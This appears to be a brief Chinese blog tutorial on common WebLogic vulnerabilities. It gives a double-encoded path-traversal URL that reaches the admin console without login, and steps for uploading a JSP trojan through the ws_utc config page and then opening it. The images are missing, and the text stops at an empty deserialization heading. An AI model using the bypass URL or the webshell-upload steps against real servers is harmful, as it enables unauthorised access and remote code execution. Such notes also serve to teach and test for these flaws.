weblogic常見漏洞

前言

weblogic的管理端口是：7001

tomcat端口：8080

jboss端口：8080

端口可以改

一、未授權登錄

進入登錄界面：http://192.168.18.45:7001/console/login/LoginForm.jsp

 

 

未授權訪問漏洞：http://192.168.18.45:7001/console/css/%252e%252e%252fconsole.portal，通過這段代碼不用登錄就可以直接訪問，

 

 

 

二、任意文件上傳漏洞操作

文字敘述步驟：

未授權訪問路徑:http://192.168.18.45:7001/ws_utc/config.do
Weblogic默認路徑：
C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\tmp\WSTestPageWorkDir
我們改成以下路徑
C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\wstestclient\i7n5e1\war\css
木馬上傳上去之后，訪問方式如下：
http://192.168.0.127:7001/ws_utc/css/config/keystore/1604376329959_whoami.jsp
1604376329959_whoami.jsp

具體操作

 

 

 

 

 

 

 

 

 

 

三、反序列化